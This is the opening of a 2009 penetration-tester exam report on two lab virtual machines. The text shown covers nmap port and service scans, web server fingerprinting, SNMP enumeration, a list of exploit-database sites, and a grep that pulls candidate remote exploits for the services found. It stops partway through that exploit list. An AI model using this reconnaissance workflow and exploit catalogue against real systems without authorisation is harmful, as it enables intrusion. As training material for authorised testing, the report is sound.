root password

63
Certified Penetration Tester (CPT) Practical Examination Report Matthew Tiedeman [email protected] February 21 st , 2009

Upload: amandeep-singh

Post on 27-Oct-2014

2.249 views

Category:

Documents


87 download

TRANSCRIPT

Page 1: Root Password

Certified Penetration Tester (CPT)

Practical Examination Report

Matthew Tiedeman

[email protected]

February 21st, 2009

Page 2: Root Password

Contents

1. Overview.......................................................................................42. Assumptions..................................................................................43. Tools.............................................................................................44. Penetration test details....................................................................5

A. Scanning...................................................................................5i. Baseline scan of network..........................................................5ii. Port scanning and OS fingerprinting...........................................5iii. Service fingerprinting - TCP services.........................................7iv. Service fingerprinting - Validation of Apache HTTP service............9v. SNMP enumeration................................................................11vi. Service fingerprinting - UDP services.......................................13

B. Sites used during the exploit research phase.................................14C. Remote exploits........................................................................15

i. Research via anyside.org.........................................................15ii. Exploits – round 1.................................................................18iii. Research via secwatch.org.....................................................19iv. Exploits – round 2.................................................................19

D. User discovery..........................................................................19i. Abuse of finger......................................................................19

E. Brute force password guessing....................................................21i. Discovery of password for “user” account..................................21ii. Discovery of password for “cptvm1” and “cptvm2” accounts........23

F. Research of cptvm1 and cptvm2 hosts..........................................25i. cptvm1.................................................................................25ii. cptmv2................................................................................27

G. Penetration of cptvm1...............................................................29i. Local exploit research via anyside.org.......................................29ii. Local exploit research via secwatch.org....................................32iii. Privilege escalation using a Kernel VMA exploit..........................33iv. Maintaining access via creation of a new “r00t” account.............34v. Gathering the shadow password file.........................................35

H. Cracking passwords of the cptvm1 host.......................................35i. Cracking of “user”, “cptvm1” and “cptvm2”................................35

I. Penetration of cptvm2................................................................36i. Privilege escalation using a Kernel vmsplice exploit.....................36ii. Maintaining access via creation of a new “r00t” account..............37iii. Gathering the shadow password file........................................38

J. Cracking passwords of the cptvm2 host........................................39i. Cracking of “cptvm1”, “cptvm2”, “root” and “r00t”.......................39

K. Cracking passwords of the cptvm1 host – round 2.........................40i. Cracking of “root” and “r00t”...................................................40

L. Ultimate goal............................................................................43i. Cptvm1 and ctpvm2 hosts compromised...................................43ii. Passwords for root accounts on cptvm1 and cptvm2...................43

Page 3: Root Password

M. Lessons learned.......................................................................43i. Searching exploit sites............................................................43ii. Attack vectors.......................................................................44

5. Appendix.....................................................................................44A. Source code for the Kernel 2.4 VMA exploit...................................44B. Source code for the Kernel 2.6 vmsplice exploit.............................59

Page 4: Root Password

1. OverviewThe certified pen tester practical examination consists of the compromising of two VMware virtual machines, the recovery of the root passwords for each system and the creation of a penetration report.The penetration report will contain, at a minimum, the details of all of the penetration test findings and a prioritized list of the vulnerabilities discovered. The penetration report should be submitted for review to: [email protected] following information was provided as part of the examination documentation:

! Virtual machine 1 (cptvm1) – VM containing a Linux system.

" The system has the following static configuration:

# IP Address: 192.168.1.200

# Netmask: 255.255.255.0

# Gateway: 192.168.1.254

# DNS: 192.168.1.254

! Virtual machine 2 (cptvm2) – VM containing a Linux system.

" The system has been configured to gain its network information via

DHCP.! Information gathered from one of the VM's during the penetration test

may be required in order to compromise the other VM.

2. Assumptions! While the penetration testing process consists of 5 phases

(reconnaissance, scanning, penetration, maintaining connectivity and covering tracks), the reconnaissance and covering tracks phases will not be covered within this report.

! Stealthy scanning and penetration techniques will not be used.

3. ToolsThe following tools were used during the completion of the penetration testing practical examination.

! back|track3 – Collection of penetration tester utilities.

! VMware Fusion – VMware virtual host software for OSX.

! Apple OSX – Host operating system used to execute VMware Fusion.

! nmap – Port scanning, fingerprinting, “swiss army knife” utility.

! httprint – HTTP fingerprinting utility.

! snmpenum.pl – SNMP enumeration utility.

! vi – Text editor.

! emacs – A “swiss army knife” editor (text/source code/etc).

! gcc – C, etc compiler.

! tftp – Trivial File Transfer Protocol client

! ssh – Secure shell client

Page 5: Root Password

! finger – Finger utility.

! bash shell scripting – Small scripts and main interactive shell.

! sed – A stream editing utility.

! awk – Lightweight regular expression text scripting utility.

! sort – Unix text sort utility.

! hydra – Multiple protocol dictionary attack utility.

! aspell – Dictionary utility.

! John the ripper, password cracker.

4. Penetration test details

A. Scanning

i. Baseline scan of network

An initial scan of the network was performed to establish a baseline of the network configuration.

The gateway (192.168.1.1), host computer (192.168.1.30), back|track3 (192.168.1.102), cptvm2 (192.168.1.104) and cptvm1 (192.168.1.200) were identified. At this point, the identification of the hosts and their use comes mainly from the exam documentation and the knowledge of how the local network is configured.

bt live # nmap -sP -n 192.168.1.1/24

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-19 07:59 GMTHost 192.168.1.1 appears to be up.MAC Address: XX:XX:XX:XX:XX:XX (Cisco-Linksys)Host 192.168.1.30 appears to be up.MAC Address: XX:XX:XX:XX:XX:XX (Apple Computer)Host 192.168.1.102 appears to be up.MAC Address: XX:XX:XX:XX:XX:XX (Apple Computer)Host 192.168.1.104 appears to be up.MAC Address: 00:0C:29:3B:43:BC (VMware)Host 192.168.1.200 appears to be up.MAC Address: 00:0C:29:27:60:0A (VMware)Nmap done: 256 IP addresses (4 hosts up) scanned in 3.269 seconds

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

cptvm2 (192.168.1.104)

ii. Port scanning and OS fingerprinting

To determine the open ports and host operating system, a port scan and OS fingerprint of the specific VM IP addresses was conducted. The port scan included all TCP ports from 1 to 65535. Due to the differences between TCP and UDP, the UDP scan was completed only on ports from 1 to 1024.

Page 6: Root Password

Based upon the list of open ports, it can be concluded that cptvm1, 192.168.1.200, is most likely a server. While cptvm2, 192.168.1.104, is most likely a client workstation.

bt live # nmap -sS -O -n -p1-65535 192.168.1.200 192.168.1.104

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:04 GMTInteresting ports on 192.168.1.200:Not shown: 65517 closed portsPORT STATE SERVICE7/tcp open echo21/tcp open ftp22/tcp open ssh23/tcp open telnet79/tcp open finger80/tcp open http109/tcp open pop2110/tcp open pop3111/tcp open rpcbind143/tcp open imap199/tcp open smux443/tcp open https686/tcp open unknown993/tcp open imaps995/tcp open pop3s6000/tcp open X1132768/tcp open unknown32770/tcp open sometimes-rpc3MAC Address: 00:0C:29:27:60:0A (VMware)Device type: general purposeRunning: Linux 2.4.XOS details: Linux 2.4.18 - 2.4.32 (likely embedded)Uptime: 0.121 days (since Tue Jan 20 09:11:03 2009)Network Distance: 1 hop

Interesting ports on 192.168.1.104:Not shown: 65532 closed portsPORT STATE SERVICE22/tcp open ssh111/tcp open rpcbind939/tcp open unknownMAC Address: 00:0C:29:3B:43:BC (VMware)Device type: general purposeRunning: Linux 2.6.XOS details: Linux 2.6.9 - 2.6.23Uptime: 0.106 days (since Tue Jan 20 09:32:16 2009)Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 2 IP addresses (2 hosts up) scanned in 19.321 seconds

bt live # nmap -sU -T5 -n -p1-1024 192.168.1.200 192.168.1.104Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 15:53 GMTWarning: Giving up on port early because retransmission cap hit.Stats: 0:00:20 elapsed; 0 hosts completed (2 up), 2 undergoing UDP ScanUDP Scan Timing: About 22.18% done; ETC: 15:54 (0:01:11 remaining)Stats: 0:00:22 elapsed; 0 hosts completed (2 up), 2 undergoing UDP ScanUDP Scan Timing: About 24.37% done; ETC: 15:54 (0:01:09 remaining)Stats: 0:00:22 elapsed; 0 hosts completed (2 up), 2 undergoing UDP ScanUDP Scan Timing: About 24.89% done; ETC: 15:54 (0:01:08 remaining)

Page 7: Root Password

Stats: 0:00:23 elapsed; 0 hosts completed (2 up), 2 undergoing UDP ScanUDP Scan Timing: About 25.05% done; ETC: 15:54 (0:01:08 remaining)Interesting ports on 192.168.1.200:Not shown: 870 open|filtered ports, 151 closed portsPORT STATE SERVICE7/udp open echo13/udp open daytime37/udp open timeMAC Address: 00:0C:29:27:60:0A (VMware)

All 1024 scanned ports on 192.168.1.104 are open|filtered (872) or closed (152)MAC Address: 00:0C:29:3B:43:BC (VMware)

Nmap done: 2 IP addresses (2 hosts up) scanned in 146.229 seconds

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: LinuxKernel version: Linux 2.4.18 - 2.4.32TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770UDP ports: 7, 13, 37

cptvm2 (192.168.1.104)

Operating system: LinuxKernel version: Linux 2.6.9 - 2.6.23TCP ports: 22, 111, 939

iii. Service fingerprinting - TCP services

As a TCP port number does not directly identify a service, fingerprinting of the services listening on the ports is required.

The majority of the TCP services were fingerprinted via nmap. The remaining services, port 109, port 993 and port 995 will require further research to properly fingerprint.

bt live # nmap -sV --version-all -n -p7,21-23,79,80,109-111,143,199,443,686,993,995,6000,32768,32770 192.168.1.200

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:27 GMTInteresting ports on 192.168.1.200:PORT STATE SERVICE VERSION7/tcp open echo21/tcp open ftp vsftpd 1.1.322/tcp open ssh OpenSSH 3.5p1 (protocol 1.99)23/tcp open telnet Linux telnetd79/tcp open finger Linux fingerd80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux))109/tcp open pop2?110/tcp open pop3 ipopd 2001.78rh111/tcp open rpcbind 2 (rpc #100000)143/tcp open imap UW Imapd 2001.315rh199/tcp open smux Linux SNMP multiplexer443/tcp open ssl/http Apache httpd 2.0.40 ((Red Hat Linux))686/tcp open rquotad 1-2 (rpc #100011)993/tcp open imaps?995/tcp open pop3s?

Page 8: Root Password

6000/tcp open X11 (access denied)32768/tcp open status 1 (rpc #100024)32770/tcp open mountd 1-3 (rpc #100005)1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :SF-Port109-TCP:V=4.60%I=9%D=1/20%Time=4975C33E%P=i686-pc-linux-gnu%r(GenerSF:icLines,4B,"\+\x20POP2\x20\[192\.168\.1\.200\]\x20v2001\.63rh\x20serverSF:\x20ready\r\n-\x20Missing\x20or\x20null\x20command\r\n")%r(Verifier,60,SF:"\+\x20POP2\x20\[192\.168\.1\.200\]\x20v2001\.63rh\x20server\x20ready\rSF:\n-\x20Bogus\x20or\x20out\x20of\x20sequence\x20command\x20-\x20SUBSCRIBSF:E\r\n");MAC Address: 00:0C:29:27:60:0A (VMware)Service Info: Host: 192.168.1.200; OSs: Unix, Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 225.977 seconds

bt live # nmap -sV --version-all -n -p22,111,939 192.168.1.104

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:33 GMTInteresting ports on 192.168.1.104:PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)111/tcp open rpcbind 2 (rpc #100000)939/tcp open status 1 (rpc #100024)MAC Address: 00:0C:29:3B:43:BC (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 11.358 seconds

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: LinuxKernel version: Linux 2.4.18 - 2.4.32TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770UDP ports: 7, 13, 37TCP services:

7/tcp echo21/tcp ftp vsftpd 1.1.322/tcp ssh OpenSSH 3.5p1 (protocol 1.99)23/tcp telnet Linux telnetd79/tcp finger Linux fingerd80/tcp http Apache httpd 2.0.40 (Red Hat Linux)109/tcp POSSIBLY pop2110/tcp pop3 ipopd 2001.78rh111/tcp rpcbind 2 (rpc #100000)143/tcp imap UW Imapd 2001.315rh199/tcp smux Linux SNMP multiplexer443/tcp ssl/http Apache httpd 2.0.40 (Red Hat Linux)686/tcp rquotad 1-2 (rpc #100011)993/tcp imaps995/tcp pop3s6000/tcp X1132768/tcp status 1 (rpc #100024)32770/tcp mountd 1-3 (rpc #100005)

cptvm2 (192.168.1.104)

Operating system: Linux

Page 9: Root Password

Kernel version: Linux 2.6.9 - 2.6.23TCP ports: 22, 111, 939TCP services:

22/tcp ssh OpenSSH 4.3 (protocol 2.0)111/tcp rpcbind 2 (rpc #100000)939/tcp status 1 (rpc #100024)

iv. Service fingerprinting - Validation of Apache HTTP service

Often the banner for a web server is disguised to hide the true web server that is running. The httprint utility was utilized to insure that the web server is actually Apache.

In this case, the use of the Apache web server was validated.

bt linux # httprint -h 192.168.1.200 -s signatures.txthttprint v0.301 (beta) - web server fingerprinting tool(c) 2003-2005 net-square solutions pvt. ltd. - see readme.txthttp://net-square.com/httprint/[email protected]

Finger Printing on http://192.168.1.200:80/Finger Printing Completed on http://192.168.1.200:80/--------------------------------------------------Host: 192.168.1.200Derived Signature:Apache/2.0.40 (Red Hat Linux)9E431BC86ED3C295811C9DC5811C9DC5811C9DC5505FCFE84276E4BB811C9DC50D7645B5811C9DC52A200B4CCD37187C11DDC7D7811C9DC5811C9DC58A91CF57FCCC535BE2CE6920FCCC535B811C9DC5E2CE6927050C5D33E2CE69279E431BC86ED3C295E2CE69262A200B4CE2CE6920E2CE6920E2CE6920E2CE6920E2CE6923E2CE6923E2CE6920811C9DC5E2CE6927E2CE6923

Banner Reported: Apache/2.0.40 (Red Hat Linux)Banner Deduced: Apache/2.0.xScore: 106Confidence: 63.86------------------------Scores:Apache/2.0.x: 106 63.86Apache/1.3.27: 101 53.96Apache/1.3.[4-24]: 101 53.96Apache/1.3.26: 100 52.11Apache/1.3.[1-3]: 96 45.12TUX/2.0 (Linux): 89 34.42Apache/1.2.6: 86 30.39Agranat-EmWeb: 76 19.19Orion/2.0x: 73 16.45Microsoft-IIS/6.0: 69 13.20Stronghold/4.0-Apache/1.3.x: 68 12.45Apache-Tomcat/4.1.29: 67 11.74Lotus-Domino/6.x: 65 10.38AssureLogic/2.0: 64 9.74Oracle Servlet Engine: 58 6.41RomPager/4.07 UPnP/1.0: 54 4.64cisco-IOS: 54 4.64Netscape-Enterprise/6.0: 53 4.25Netscape-Enterprise/4.1: 53 4.25AkamaiGHost: 50 3.19CompaqHTTPServer/1.0: 47 2.30HP-ChaiServer/3.0: 46 2.04Microsoft-IIS/5.0: 44 1.56

Page 10: Root Password

Microsoft-IIS/5.0 ASP.NET: 44 1.56Microsoft-IIS/5.1: 44 1.56Netscape-Enterprise/3.5.1G: 44 1.56Com21 Cable Modem: 44 1.56thttpd: 44 1.56Lexmark Optra Printer: 44 1.56Boa/0.94.11: 44 1.56WebSitePro/2.3.18: 44 1.56Stronghold/2.4.2-Apache/1.3.x: 43 1.34Xerver_v3: 43 1.34ServletExec: 41 0.96Zope/2.6.0 ZServer/1.1b1: 41 0.96WebLogic XMLX Module 8.1: 41 0.96Microsoft ISA Server (external): 40 0.79Jetty (unverified): 40 0.79IDS-Server/3.2.2: 38 0.48CompaqHTTPServer/4.2: 23 0.45squid/2.5.STABLE5: 23 0.45SunONE WebServer 6.0: 22 0.45JRun Web Server: 22 0.45Microsoft-IIS/URLScan: 21 0.44NetWare-Enterprise-Web-Server/5.1: 24 0.44TightVNC: 24 0.44Linksys WRTP54G: 24 0.44GWS/2.1 Google Web Server: 24 0.44Netscape-Enterprise/3.6: 20 0.43MiniServ/0.01 Webmin: 20 0.43fnord: 20 0.43MiniServ/0.01: 20 0.43Tcl-Webserver/3.4.2: 20 0.43Zeus/4.0: 25 0.43Hewlett Packard xjet: 25 0.43HP Jet-Direct Print Server: 25 0.43Resin/3.0.8: 19 0.42RealVNC/4.0: 26 0.41WebLogic Server 8.x: 27 0.39WebLogic Server 8.1: 27 0.39Linksys with Talisman firmware: 27 0.39Oracle XML DB/Oracle9i: 17 0.38Microsoft-IIS/5.0 Virtual Host: 17 0.38Adaptec ASM 1.1: 17 0.38Linksys AP2: 28 0.36BaseHTTP/0.3 Python/2p3.3 edna/0.4: 28 0.36Lotus-Domino/5.x: 15 0.33Netscape-Enterprise/3.6 SP2: 29 0.32Netscape-Enterprise/3.5.1: 14 0.30EHTTP/1.1: 14 0.30Tomcat Web Server/3.2.3: 14 0.30Surgemail webmail (DManager): 14 0.30Jetty/4.2.2: 30 0.27Netscape-Enterprise/4.1: 12 0.25Zeus/4.1: 36 0.23Intel NetportExpressPro/1.0: 36 0.23Cisco-HTTP: 11 0.22Cisco Pix 6.2: 11 0.22AOLserver/3.4.2-3.5.1: 31 0.21Jana Server/1.45: 31 0.21EMWHTTPD/1.0: 31 0.21Ipswitch-IMail/8.12: 31 0.21RemotelyAnywhere: 10 0.193Com/v1.0: 10 0.19Microsoft ISA Server (internal): 10 0.19Allied Telesyn Ethernet switch: 10 0.19WebSENSE/1.0: 10 0.19Netgear MR814v2 - IP_SHARER WEB 1.0: 10 0.19

Page 11: Root Password

MikroTik RouterOS: 35 0.12Zeus/4_2: 33 0.07CompaqHTTPServer-SSL/4.2: 33 0.07Microsoft-IIS/4.0: 34 0.02Domino-Go-Webserver/4.6.2.8: 34 0.02AOLserver/3.5.6: 34 0.02dwhttpd (Sun Answerbook): 34 0.02SMC Wireless Router 7004VWBR: 34 0.02Belkin Wireless router: 34 0.02VisualRoute 2005 Server Edition: 34 0.02JC-HTTPD/1.14.18: 34 0.02Ubicom/1.1: 2 0.01Ubicom/1.1 802.11b: 2 0.01Tanberg 880 video conf: 2 0.01Snap Appliances, Inc./3.x: 1 0.00Linksys AP1: 0 0.00Linksys Router: 0 0.00Linksys Print Server: 0 0.00NetBuilderHTTPDv0.1: 0 0.00NetPort Software 1.1: 0 0.00Linksys BEFSR41/BEFSR11/BEFSRU31: 0 0.00MailEnable-HTTP/5.0: 0 0.00

v. SNMP enumeration

The snmp service was identified as listening on port 199/tcp of the cptvm1 host, 192.168.1.200. In addition, the cptvm1 host OS was identified as Linux. With these two factors in mind, the snmpenum.pl utility can be utilized to gather system information. Of particular interest are the UDP services currently running on the hosts.

Along with UDP ports 7, 13, 37, 111, 123, 161, 162, 631 and 683, various process and service information was discovered.

bt snmpenum # snmpenum.pl 192.168.1.200 public linux.txt---------------------------------------- UPTIME----------------------------------------1 hour, 40:22.46---------------------------------------- HOSTNAME----------------------------------------cptvm1---------------------------------------- RUNNING SOFTWARE PATHS----------------------------------------initkeventdkapmdksoftirqd_CPU0kswapdkscand/DMAkscand/Normalkscand/HighMembdflush---------------------------------------- RUNNING PROCESSES----------------------------------------initkeventd

Page 12: Root Password

kapmdksoftirqd_CPU0kswapdkscand/DMAkscand/Normalkscand/HighMembdflush---------------------------------------- MOUNTPOINTS----------------------------------------//proc/bus/usb/boot/dev/shmReal MemorySwap SpaceMemory Buffers---------------------------------------- SYSTEM INFO----------------------------------------Linux cptvm1 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686---------------------------------------- LISTENING UDP PORTS----------------------------------------71337111123161162631683---------------------------------------- LISTENING TCP PORTS----------------------------------------72122237980109110111

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: LinuxKernel version: 2.4.20-8TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770TCP services:

7/tcp echo21/tcp ftp vsftpd 1.1.322/tcp ssh OpenSSH 3.5p1 (protocol 1.99)23/tcp telnet Linux telnetd79/tcp finger Linux fingerd80/tcp http Apache httpd 2.0.40 (Red Hat Linux)109/tcp POSSIBLY pop2110/tcp pop3 ipopd 2001.78rh111/tcp rpcbind 2 (rpc #100000)143/tcp imap UW Imapd 2001.315rh

Page 13: Root Password

199/tcp smux Linux SNMP multiplexer443/tcp ssl/http Apache httpd 2.0.40 (Red Hat Linux)686/tcp rquotad 1-2 (rpc #100011)993/tcp imaps995/tcp pop3s6000/tcp X1132768/tcp status 1 (rpc #100024)32770/tcp mountd 1-3 (rpc #100005)

UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683

cptvm2 (192.168.1.104)

Operating system: LinuxKernel version: Linux 2.6.9 - 2.6.23TCP ports: 22, 111, 939TCP services:

22/tcp ssh OpenSSH 4.3 (protocol 2.0)111/tcp rpcbind 2 (rpc #100000)939/tcp status 1 (rpc #100024)

vi. Service fingerprinting - UDP services

Like TCP ports, UDP ports do not directly identify services. Therefore, the services listening on the UDP ports will need to be fingerprinted.

All UDP services except port 631 were properly fingerprinted.

bt linux # nmap -sU -sV --version-all -n -p7,13,37,111,123,161,162,631,683 192.168.1.200

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:54 GMTInteresting ports on 192.168.1.200:PORT STATE SERVICE VERSION7/udp open echo13/udp open daytime37/udp open time (32 bits)111/udp open rpcbind 2 (rpc #100000)123/udp open|filtered ntp161/udp open snmp SNMPv1 server (public)162/udp open|filtered snmptrap631/udp open|filtered unknown683/udp open rquotad 1-2 (rpc #100011)MAC Address: 00:0C:29:27:60:0A (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 51.467 seconds

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: LinuxKernel version: 2.4.20-8TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770TCP services:

7/tcp echo21/tcp ftp vsftpd 1.1.322/tcp ssh OpenSSH 3.5p1 (protocol 1.99)23/tcp telnet Linux telnetd79/tcp finger Linux fingerd80/tcp http Apache httpd 2.0.40 (Red Hat Linux)

Page 14: Root Password

109/tcp POSSIBLY pop2110/tcp pop3 ipopd 2001.78rh111/tcp rpcbind 2 (rpc #100000)143/tcp imap UW Imapd 2001.315rh199/tcp smux Linux SNMP multiplexer443/tcp ssl/http Apache httpd 2.0.40 (Red Hat Linux)686/tcp rquotad 1-2 (rpc #100011)993/tcp imaps995/tcp pop3s6000/tcp X1132768/tcp status 1 (rpc #100024)32770/tcp mountd 1-3 (rpc #100005)

UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683UDP services:

7/udp echo13/udp daytime37/udp time (32 bits)111/udp rpcbind 2 (rpc #100000)123/udp ntp161/udp snmp SNMPv1 server (public)162/udp snmptrap631/udp unknown683/udp rquotad 1-2 (rpc #100011)

cptvm2 (192.168.1.104)

Operating system: LinuxKernel version: Linux 2.6.9 - 2.6.23TCP ports: 22, 111, 939TCP services:

22/tcp ssh OpenSSH 4.3 (protocol 2.0)111/tcp rpcbind 2 (rpc #100000)939/tcp status 1 (rpc #100024)

B. Sites used during the exploit research phaseThere are various sites available for the research of software exploits. While the following list is not all inclusive, it does provide fairly good coverage:

http://www.milw0rm.com - Exploit database.http://secwatch.org/ - Exploits databasehttp://packetstormsecurity.org - Exploits databasehttp://www.securityforest.com/ - Exploits database and securityforest exploits update script.http://anyside.org/ - Exploits databasehttp://www.remote-exploit.org/ - Contains back|track, milw0rm and securityfocus exploit update scripts.http://www.brandonhutchinson.com/ - Contains packetstormsecurity exploits update script.http://www.governmentsecurity.org/exploits.php – Exploit information.http://insecure.org/sploits.html – Exploit information.http://www.securiteam.com/exploits/ - Exploit information.http://www.iss.net/ – Exploits information.http://www.hoobie.net/security/exploits/ - Exploits information.http://www.vupen.com/exploits/ - Archive of private exploits and proof-of-concept codes developed by VUPEN Security.

Page 15: Root Password

http://www.security-protocols.com - Security advisories.http://metasploit.org – Exploit platform.http://www.malware.com/ - Exploits information.http://www.immunitysec.com/index.shtml – Exploit platform.http://www.datastronghold.com – Exploit information and hacking techniques.http://www.illmob.org/ - Exploit information.

C. Remote exploits

i. Research via anyside.org

A list of exploits was downloaded from the anyside.org web site. The list consisted of a small description of the exploit and a link to the source code for the exploit. A list of search items was then created based upon the findings from the scanning phase.

$ cat ../commands/remote-search.txt apachefingerimapipopntpopen sshopensshrpcrpcbindrpcmountrpcstatusrquotasnmpsnmptraptelnetvs ftpvsftpx11

The search items list and the exploit list were used to gain a list of possible remote exploits for the cptvm1 host.

$ grep exploits\/remote exploits_list.txt | grep -w -i -f ../commands/remote-search.txt | sort -u > possible_remote_200.txt

$ lltotal 1664drwxr-xr-x 6 matt matt 204 Feb 21 14:46 ./drwxr-xr-x 16 matt matt 544 Feb 21 14:46 ../-rw-r--r-- 1 matt matt 126720 Feb 6 14:40 exploits_list.db.tgz-rw-r--r-- 1 matt matt 702666 Sep 21 05:52 exploits_list.txt-rw-r--r-- 1 matt matt 9376 Feb 6 14:43 possible_remote_200.txt

$ cat possible_remote_200.txt ....;http://www.anyside.org/exp/exploits/remote/09.16.MS03-039-exp.c;Remote Windows exploit for the RPC DCOM long filename heap overflow discovered by NSFOCUS. Related advisory....;http://www.anyside.org/exp/exploits/remote/101_ncat.c;MailEnable , IMAP Service, Remote Buffer Overflow Exploit v0.4

Page 16: Root Password

....;http://www.anyside.org/exp/exploits/remote/ADMmountd.c;ADM mountd exploit - Linux rpc.mountd 2.2beta29 remote root exploit....;http://www.anyside.org/exp/exploits/remote/DComExpl_UnixWin32.zip;Windows port of the remote exploit utilizing the DCOM RPC overflow originally coded by H D Moore.....;http://www.anyside.org/exp/exploits/remote/Mercury-IMAP-exp.txt;Exploit code for the Mercury32 IMAP Rename buffer overflow....;http://www.anyside.org/exp/exploits/remote/MercuryMail-exp.txt;Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow....;http://www.anyside.org/exp/exploits/remote/OpenFuckV2.c;Remote exploit for Apache + OpenSSL v0.9.6d and below. This exploit is based upon the openssl-too-open exploit by Solar Eclipse and offers more than 130 targets including various flavors of Linux.....;http://www.anyside.org/exp/exploits/remote/apache-squ1rt.c;Apache &lt;= 2.0.52 HTTP GET Remote Denial of Service Exploit....;http://www.anyside.org/exp/exploits/remote/apache_xpl.txt;Apache 2.0.52 and earlier DoS....;http://www.anyside.org/exp/exploits/remote/dcom.c;Remote exploit utilizing the DCOM RPC overflow discovered by LSD. Includes targets for Windows 2000 and XP. Binds a shell on port 4444.....;http://www.anyside.org/exp/exploits/remote/getusr.c;Exploit that makes use of the mod_userdir vulnerability in various Apache 1.3 and 2.x servers.....;http://www.anyside.org/exp/exploits/remote/httpdDoS-pl.txt;Denial of service test exploit for the flaw in Apache httpd 2.0.49....;http://www.anyside.org/exp/exploits/remote/ipswitch.c;Ipswitch IMAP Server "LOGIN" Command Remote Stack Overflow Exploit....;http://www.anyside.org/exp/exploits/remote/m00-apache-w00t.tar.gz;Apache 1.3.*-2.0.48 remote users disclosure exploit - Checks Apache webservers for a wrong default configuration of mod_userdir which allows account name guessing and then attempts to login to the found accounts with ftp. Effective against Linux and *BSD boxes.....;http://www.anyside.org/exp/exploits/remote/rpc!exec.c;Windows remote rpc dcom exploit which bypasses non-executable stack protection by using return into libc. Tested against OverflowGuard and StackDefender (with kernel32 imagebase randomization) running on Windows 2000 SP0 and Windows XP SP0.....;http://www.anyside.org/exp/exploits/remote/telnet.c;Solaris 2.6, 7, and 8 telnetd remote exploit.....;http://www.anyside.org/exp/exploits/remote/wgetusr.c;Exploit that makes use of the mod_userdir vulnerability in various Apache 1.3 and 2.x servers.2003-12-8;http://www.anyside.org/exp/exploits/remote/m00-apache-w00t.c;Apache 1.3.*-2.0.48 mod_userdir remote users disclosure Exploit2003-4-1;http://www.anyside.org/exp/exploits/remote/rpcexp.c;Microsoft Windows RPC Locator Service remote exploit. Binds cmd.exe to port 5151. Tested again Windows 2000 SP3 and Windows NT 4 SP6a.2003-9-18;http://www.anyside.org/exp/exploits/remote/mounty.c;Remote root exploit for rpc.mountd that makes use of the xlog off-by-one vulnerability discussed2004-1-4;http://www.anyside.org/exp/exploits/remote/wts_bo.c;Jordan Windows Telnet Server v1.2 remote buffer overflow exploit. Binds a shell on port 9191. Tested on Win32 and Unix.2004-4-25;http://www.anyside.org/exp/exploits/remote/lsasrv.c;Windows Lsasrv.dll RPC ms04011 buffer overflow Remote Exploit2004-5-2;http://www.anyside.org/exp/exploits/remote/HOD-ms04011-lsasrv-expl.c;MS04011 Lsasrv.dll RPC buffer overflow remote exploit2004-9-24;http://www.anyside.org/exp/exploits/remote/mdaemon_imap.c;Remote buffer overflow in MDaemon IMAP and SMTP server2004-9-3;http://www.anyside.org/exp/exploits/remote/sm00ny-courier_imap_fsx.c;Courier-IMAP &lt;= 3.0.2-r1 auth_debug() Remote Format String Exploit2005-03-17;http://www.anyside.org/exp/exploits/remote/goodtech.c;GoodTech Telnet Server < 5.0.7 Remote Buffer Overflow Exploit2005-04-25;http://www.anyside.org/exp/exploits/remote/goodtech_expl.c;GoodTech Telnet Server < 5.0.7 Remote BoF Exploit2005-04-30;http://www.anyside.org/exp/exploits/remote/Snmppd.c;Snmppd SNMP proxy daemon format string exploit

Page 17: Root Password

2005-06-07;http://www.anyside.org/exp/exploits/remote/2005060701.txt;IPSwitch IMAP Server LOGON Remote Stack Overflow2005-09-20;http://www.anyside.org/exp/exploits/remote/2005092001.txt;Mercury Mail <= 4.01a (Pegasus) IMAP Buffer Overflow Exploit2006-03-10;http://www.anyside.org/exp/exploits/remote/2006031002.txt;Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service2006-03-19;http://www.anyside.org/exp/exploits/remote/2006031901.txt;Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit2006-03-19;http://www.anyside.org/exp/exploits/remote/2006031903.txt;Mercur Mailserver 5.0 SP3 (IMAP) Denial of Service Exploit2006-06-05;http://www.anyside.org/exp/exploits/remote/2006060506.txt;Linux Kernel < 2.6.16.18 (Netfilter NAT SNMP Module) Remote DoS Exploit2006-07-23;http://www.anyside.org/exp/exploits/remote/2006072301.txt;Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability2006-08-21;http://www.anyside.org/exp/exploits/remote/2006082105.txt;Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote 